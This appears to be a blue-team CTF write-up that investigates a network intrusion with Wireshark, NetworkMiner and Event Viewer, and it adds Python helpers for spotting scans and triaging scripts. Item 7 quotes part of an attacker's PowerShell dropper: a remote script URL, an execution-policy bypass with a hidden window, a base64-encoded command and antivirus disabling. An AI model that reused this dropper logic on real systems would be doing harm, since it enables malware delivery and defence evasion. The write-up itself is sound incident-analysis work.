1-To detect the IP responsible for the port scanning I used the same approach: open the HTTP requests tab and the first IP stands out at once, because it made a lot of requests and all of them look suspicious. Getting a quick visual picture of what happened always makes it easier to predict what your next move should be.
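The "who made the most connection attempts, to the most ports" judgement made by eye above can be automated. The following Python check is an added example, not part of the original writeup or of the challenge material: it takes constructed connection records of the form (src_ip, dst_ip, dst_port, TCP flags), similar to what a Wireshark conversation export would give, counts SYN-only attempts per source and flags sources that touched many distinct destination ports. All IP addresses and thresholds in it are made up.

```python
from collections import Counter, defaultdict
from typing import List, Tuple

# One record per TCP segment: (src_ip, dst_ip, dst_port, flags).
# A SYN without ACK is a fresh connection attempt, which is what a port
# scanner produces in bulk; replies (SA, RA, A) are not attempts.
Flow = Tuple[str, str, int, str]

# Constructed sample (addresses are invented, not from the capture):
# one host browsing normally, one host sweeping 40 ports on a server.
BENIGN: List[Flow] = [
    ("10.10.1.7", "10.10.1.20", 80, "S"),
    ("10.10.1.20", "10.10.1.7", 51000, "SA"),
    ("10.10.1.7", "10.10.1.20", 80, "A"),
    ("10.10.1.7", "10.10.1.20", 443, "S"),
    ("10.10.1.7", "10.10.1.20", 445, "S"),
]
SCANNER: List[Flow] = [("10.10.1.66", "10.10.1.20", port, "S") for port in range(1, 41)]
# A few RST/ACK answers from the server to closed ports, as a scan would trigger.
SERVER_REPLIES: List[Flow] = [("10.10.1.20", "10.10.1.66", 40000 + p, "RA") for p in range(5)]
SAMPLE_FLOWS: List[Flow] = BENIGN + SCANNER + SERVER_REPLIES


def scan_candidates(flows: List[Flow], min_ports: int = 10) -> List[Tuple[str, int, int]]:
    """Return (src_ip, distinct (dst, port) pairs, SYN count) for every source
    that attempted at least `min_ports` distinct destination ports.

    Only SYN-without-ACK segments count, so servers answering a scan are not
    mistaken for the scanner. Result is sorted by breadth, then volume.
    """
    targets = defaultdict(set)
    syns: Counter = Counter()
    for src, dst, dport, flags in flows:
        if "S" in flags and "A" not in flags:
            targets[src].add((dst, dport))
            syns[src] += 1
    report = [(src, len(t), syns[src]) for src, t in targets.items() if len(t) >= min_ports]
    report.sort(key=lambda r: (-r[1], -r[2], r[0]))
    return report


def top_sources(flows: List[Flow]) -> List[Tuple[str, int]]:
    """Raw packet count per source, the 'who sent the most' view used above.
    Useful as a first glance, but a chatty server can outrank a quiet scanner."""
    return Counter(src for src, _, _, _ in flows).most_common()


if __name__ == "__main__":
    for src, ports, attempts in scan_candidates(SAMPLE_FLOWS):
        print(f"{src}: {ports} distinct ports, {attempts} SYNs -> likely scanner")
    print("busiest sources:", top_sources(SAMPLE_FLOWS)[:3])
```

Lowering `min_ports` shows the benign host too, which is why the breadth threshold matters more than the packet count alone.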
2-To determine the targeted account username, the easiest way is to open NetworkMiner and look at the Credentials tab, which shows directly which account is targeted. "Defend smarter, not harder."
3-To find the password I used the same way as for the username.
4-To identify which setting the attacker changed, I opened the NetworkMiner Parameters section. There is a RECONFIGURE parameter, and the query below it shows the change that was made, which is "xp_cmdshell".
5-To detect the process injection I checked Event Viewer and started opening every event and reading the details until I found Host-name=MSFConsole. It is our beloved Metasploit, so this identifies the Host Application, one of the devils in our story.
6-To get the file that the attacker attempted to download, I added the attacker IP as a filter plus request method GET.
7-To understand which SID the script checked, I think it is the perfect time to understand what the script does.
In overview, the script does several things at the same time:
Determine Privilege Level: Checks if the script is running with administrative privileges.
Determine OS Version: Retrieves the major version of the operating system.
Set Error Preferences: Configures error handling to suppress warnings and errors.
Define URL: Specifies a URL to interact with.
Test URL Reachability: Checks if specified URLs are reachable.
Stop Antivirus Services: Attempts to disable Windows Defender and other antivirus services.
Download and Schedule Tasks: Downloads additional scripts and schedules them to run periodically.
    $scriptUrl = "http://87.96.21.84/del.ps1"
    if (Test-URL -url $url) {
        Write-Host "Connection to $url successful. Proceeding with execution."
        if (Test-ScriptURL -scriptUrl $scriptUrl) {
            Write-Host "Script at $scriptUrl is reachable."
            if ($priv) {
                CleanerEtc
                $encodedDiscovery = "SW52b2tlLUV4cHJlc3Npb24gIndob2FtaSI="
                $decodedDiscovery = [System.Convert]::FromBase64String($encodedDiscovery)
                $commandDiscovery = [System.Text.Encoding]::UTF8.GetString($decodedDiscovery)
                powershell -exec bypass -w 1 $commandDiscovery
                Write-Host "Privilege level: SYSTEM"
            } else {
                CleanerNoPriv
                Write-Host "Privilege level: User"
            }
        } else {
            Write-Host "Script at $scriptUrl is not reachable. Terminating."
            exit
        }
    } else {
        Write-Host "Connection to $url failed. Terminating."
        exit
    }
    if ($priv -eq $true) {
        try { StopAV } catch {}
        Start-Sleep -Seconds 1
        CleanerEtc
    } else {
        CleanerNoPriv
    }
Checks Connectivity: If the base URL is reachable, it proceeds; otherwise, it terminates.
Checks Script Availability: If the script URL is reachable, it continues based on the privilege level.
Privileged User: Executes CleanerEtc and a base64-decoded command (Invoke-Expression "whoami").
Non-Privileged User: Executes CleanerNoPriv.
Disables AV: If privileged, attempts to disable antivirus services before running the cleaner functions again.
So after explaining the script we can determine the SID.
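The manual reading above (spot the URL, decode the base64 blob, notice the AV-stopping and hidden-window switches) can be turned into a repeatable static triage step. The Python helper below is an added example, not part of the original writeup and not the attacker's code: it scans PowerShell text for URLs, decodes base64-looking tokens when they yield printable text, and maps suspicious keywords to MITRE ATT&CK techniques. The sample it runs on is the fragment quoted above reflowed onto separate lines; the helper functions it calls (Test-URL, StopAV, CleanerEtc, CleanerNoPriv) are not on the page and are left undefined on purpose. The indicator patterns and technique mappings are my own choices, not something the challenge provides.

```python
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Constructed sample: the dropper fragment quoted in the writeup, reflowed.
# Function bodies (Test-URL, StopAV, CleanerEtc, ...) are not on the page.
SAMPLE_SCRIPT = r'''
$scriptUrl = "http://87.96.21.84/del.ps1"
if (Test-URL -url $url) {
    Write-Host "Connection to $url successful. Proceeding with execution."
    if (Test-ScriptURL -scriptUrl $scriptUrl) {
        if ($priv) {
            CleanerEtc
            $encodedDiscovery = "SW52b2tlLUV4cHJlc3Npb24gIndob2FtaSI="
            $decodedDiscovery = [System.Convert]::FromBase64String($encodedDiscovery)
            $commandDiscovery = [System.Text.Encoding]::UTF8.GetString($decodedDiscovery)
            powershell -exec bypass -w 1 $commandDiscovery
        } else {
            CleanerNoPriv
        }
    }
}
if ($priv -eq $true) {
    try { StopAV } catch {}
    Start-Sleep -Seconds 1
    CleanerEtc
} else {
    CleanerNoPriv
}
'''

# (label, regex, ATT&CK technique). Keyword heuristics chosen for this example;
# they cover what the writeup points at, not every PowerShell abuse pattern.
INDICATORS: List[Tuple[str, str, str]] = [
    ("execution-policy bypass", r"-exec(?:utionpolicy)?\s+bypass", "T1059.001 PowerShell"),
    ("hidden window (-w 1 / -WindowStyle Hidden)", r"-w(?:indowstyle)?\s+(?:1|hidden)\b", "T1564.003 Hidden Window"),
    ("AV or process tampering", r"\b(?:StopAV|Stop-Process|Stop-Service)\b", "T1562.001 Disable or Modify Tools"),
    ("scheduled task", r"\b(?:schtasks|Register-ScheduledTask|New-ScheduledTask)\b", "T1053.005 Scheduled Task"),
    ("payload download", r"\b(?:Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer)\b", "T1105 Ingress Tool Transfer"),
    ("runtime base64 decode", r"FromBase64String", "T1140 Deobfuscate/Decode Files or Information"),
]


def extract_urls(script: str) -> List[str]:
    """Unique http(s) URLs, sorted; these are the download locations to block."""
    return sorted(set(re.findall(r"https?://[^\s\"'<>)]+", script)))


def decode_base64_candidates(script: str, min_len: int = 20) -> List[Tuple[str, str]]:
    """Find long base64-alphabet runs and keep those that decode to printable text.

    min_len=20 skips ordinary identifiers such as FromBase64String (16 chars)
    that happen to fit the alphabet; the printable check drops false positives
    that decode to binary noise.
    """
    found = []
    for match in re.finditer(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, script):
        token = match.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="replace")
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            found.append((token, text))
    return found


def triage(script: str) -> Dict[str, object]:
    """Static triage report: URLs, decoded blobs, and matched technique indicators."""
    hits = [(label, tech) for label, pat, tech in INDICATORS if re.search(pat, script, re.IGNORECASE)]
    return {"urls": extract_urls(script), "decoded": decode_base64_candidates(script), "indicators": hits}


if __name__ == "__main__":
    report = triage(SAMPLE_SCRIPT)
    print("URLs:", report["urls"])
    for token, text in report["decoded"]:
        print(f"base64 {token} -> {text}")
    for label, tech in report["indicators"]:
        print(f"{label}: {tech}")
```

Running it on the fragment recovers the download URL, turns the encoded string back into Invoke-Expression "whoami", and flags the bypass, hidden-window and StopAV indicators; the scheduled-task pattern stays quiet here because that part of the script lives in CleanerEtc, which the fragment does not include.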
8-To determine the registry keys used, I went to the StopAV function in the script and found the keys.
9-The second download URL first appears in the CleanerEtc function.
10-After analyzing the script everything becomes easy: in the CleanerEtc function we can identify the persistence task.
11-The second script is del.ps1, and I identified it in two ways, with the same filter in Wireshark and in NetworkMiner. After analyzing this script, the most important thing from my point of view is the Stop-Process command, which maps directly to Defense Evasion according to MITRE.